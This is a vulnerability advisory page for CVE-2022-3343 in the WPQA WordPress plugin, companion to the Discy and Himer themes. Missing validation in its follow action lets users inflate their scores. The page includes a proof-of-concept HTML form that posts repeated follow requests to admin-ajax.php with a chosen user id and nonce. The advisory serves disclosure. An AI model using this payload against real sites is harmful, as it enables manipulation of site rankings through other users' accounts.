Lucene search
Harsh TandelWPEX-ID:E507B1B5-1A56-4B2F-B7E7-E22F6DA1E32AHistoryDec 13, 2022 - 12:00 a.m.
WPQA < 5.9.3 - Missing validation lead to functionality abuse
2022-12-1300:00:00
Harsh Tandel
146
wpqa
missing validation
functionality abuse
admin-ajax.php
nonce
exploit
0.001 Low
EPSS
Percentile
23.4%
The plugin (which is a companion plugin used with Discy and Himer themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpqa_following_you">
<!-- change the following value to the user id of the user you wish to reward! -->
<input type="hidden" name="following_var_id" value="2">
<!-- Version 5.9.1 checks nonce, replace with the correct one for the user submitting the form. -->
<input type="hidden" name="following_nonce" value="1234567890">
<input type="submit" value="Get rich!">
</form>Related
prion
prion
Design/Logic Flaw
2023-01-09 23:15:00
wpvulndb
wpvulndb
WPQA < 5.9.3 - Missing validation lead to functionality abuse
2022-12-13 00:00:00
cve
cve
CVE-2022-3343
2023-01-09 23:15:26
cvelist
cvelist
CVE-2022-3343 WPQA < 5.9.3 - Missing validation lead to functionality abuse
2023-01-09 22:13:27
nvd
nvd
CVE-2022-3343
2023-01-09 23:15:26